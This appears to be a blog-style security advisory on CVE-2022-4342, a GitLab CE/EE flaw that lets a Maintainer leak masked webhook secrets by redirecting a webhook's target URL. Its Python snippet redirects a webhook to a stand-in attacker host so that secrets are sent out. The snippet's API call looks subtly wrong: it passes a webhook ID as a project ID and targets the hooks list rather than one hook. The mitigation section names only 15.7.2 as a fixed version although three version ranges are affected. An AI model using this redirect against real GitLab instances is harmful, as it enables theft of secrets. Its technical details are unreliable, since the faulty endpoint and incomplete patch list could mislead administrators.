CVE-2022-4342: GitLab CE/EE Vulnerability - Masked Webhook Secrets Leak

A critical security issue, identified as CVE-2022-4342, has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This issue affects all versions starting from 15.1 before 15.5.7, all versions starting from 15.6 before 15.6.4, and all versions starting from 15.7 before 15.7.2. The vulnerability allows a malicious Maintainer to leak masked webhook secrets by changing the target URL of the webhook. In this post, we'll discuss the details of the vulnerability, its impact, and possible mitigation steps. Also, we'll provide code snippets to demonstrate the issue and reference links to the original sources.

Vulnerability Details

The vulnerability exists in the webhook functionality of GitLab CE/EE. Webhooks are user-defined HTTP callbacks that occur whenever a specific event is triggered in GitLab. When a webhook is triggered, GitLab sends an HTTP POST request to the configured URL, which often contains sensitive information such as access tokens or API keys. These secrets should be masked so that unauthorized users cannot access them.

However, in the affected GitLab versions, a malicious Maintainer can exploit this vulnerability to leak masked webhook secrets. They can do this by changing the target URL of the webhook to a URL controlled by the attacker. When the webhook is triggered, sensitive information is sent to the attacker's URL instead of the intended destination, granting the attacker unauthorized access to the leaked secrets.

Code Snippet

# Sample exploit code showing how a malicious Maintainer can change the webhook URL.

import requests

# Replace GITLAB_URL, PRIVATE_TOKEN, and WEBHOOK_ID with appropriate values
GITLAB_URL = 'https://gitlab.example.com';
PRIVATE_TOKEN = 'your-private-token'
WEBHOOK_ID = 1
MALICIOUS_URL = 'https://attacker.example.com';

headers = {
    'Private-Token': PRIVATE_TOKEN,
}

data = {
    'url': MALICIOUS_URL,
}

url = f'{GITLAB_URL}/api/v4/projects/{WEBHOOK_ID}/hooks'
response = requests.put(url, headers=headers, data=data)

if response.status_code == 200:
    print('Webhook URL has been changed to:', MALICIOUS_URL)
else:
    print('Failed to change webhook URL')

Mitigation

GitLab has released patches to address this vulnerability. Users running affected versions of GitLab CE/EE should update to one of the following fixed versions, depending on their current version:

15.7.2

It is strongly recommended that users apply these updates as soon as possible. In addition to updating GitLab software, it is essential for GitLab administrators to review webhook configurations and ensure that webhook URLs have not been tampered with.

For more information on this vulnerability, you can refer to the following resources

- GitLab Security Advisory: CVE-2022-4342
- National Vulnerability Database: CVE-2022-4342

Conclusion

The CVE-2022-4342 vulnerability poses a significant risk for users of the affected GitLab CE/EE versions. Malicious actors can leak sensitive information by tampering with webhook target URLs. To protect their resources, users should update their GitLab software and review webhook configurations. Additionally, always stay informed about the latest security updates and best practices for managing your GitLab instances.

Timeline

Published on: 01/12/2023 04:15:00 UTC
Last modified on: 01/18/2023 20:34:00 UTC